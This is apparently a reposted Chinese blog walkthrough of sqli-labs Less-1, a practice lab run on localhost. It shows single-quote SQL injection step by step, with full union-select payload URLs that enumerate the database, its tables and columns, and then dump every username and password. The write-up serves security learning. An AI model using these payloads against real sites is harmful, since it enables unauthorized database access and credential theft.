标签：指北 sqlilabs Less 数据库 name 随缘 table id 页面

web毕竟不是主业，龟速更新，萌新一头如有错误还望大佬们指出

Less-1

尝试 ?id=1 回显正常

接着尝试在 id 后面加上'，发现页面回显不正常，表示可能存在字符注入

输入 --+ 将 sql 后面的语句注释掉后，发现页面回显正常，则证明这个地方是单引号字符型注入

接着使用 order by 判断该表中一共有几列数据。order by 3 页面回显正常，4 页面回显不正常，说明此表一共有 3 列

将 id=1 改为一个数据库不存在的 id 值，如 466，使用 union select 1,2,3 联合查询语句查看页面是否有显示位

发现页面先输出了 2 和 3，说明页面有 2 个显示位

然后利用 sql 查询语句依次爆破出数据库内的数据库名，表名，列名，字段信息

查询当前使用的数据库和基本信息
http://localhost/sqli-labs-master/Less-1/?id=466' union select 1,2,concat_ws(char(32,58,32),user(),database(),version()) --+
其中 concat_ws() 的第一个参数是连接字符串的分隔符，user()返回当前数据库连接使用的用户，database()返回当前数据库连接使用的数据库，version()返回当前数据库的版

在继续爆破前先明确以下知识点：

• information_schema.tables: 包含了数据库里所有的表
• table_name: 表名
• table_schema: 数据库名
• column_name: 字段名

查询数据库security的表
http://localhost/sqli-labs-master/Less-1/?id=466' union select 1,2,group_concat(table_name) from information_schema.tables where  table_schema=0x7365637572697479 --+

接着看users表的字段名
http://localhost/sqli-labs-master/Less-1/id=466' union select 1,2,group_concat(column_name)from information_schema.columns where table_name='users'--+

看到了 username 和 password 字段

然后去查询字段信息
http://localhost/sqli-labs-master/Less-1/id=466' union select 1,2,group_concat(0x5c,username,0x3a,password) from users--+

获得了所有的账号和密码，本题到此结束

标签：指北,sqlilabs,Less,数据库,name,随缘,table,id,页面
来源： https://www.cnblogs.com/Moomin/p/15043640.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。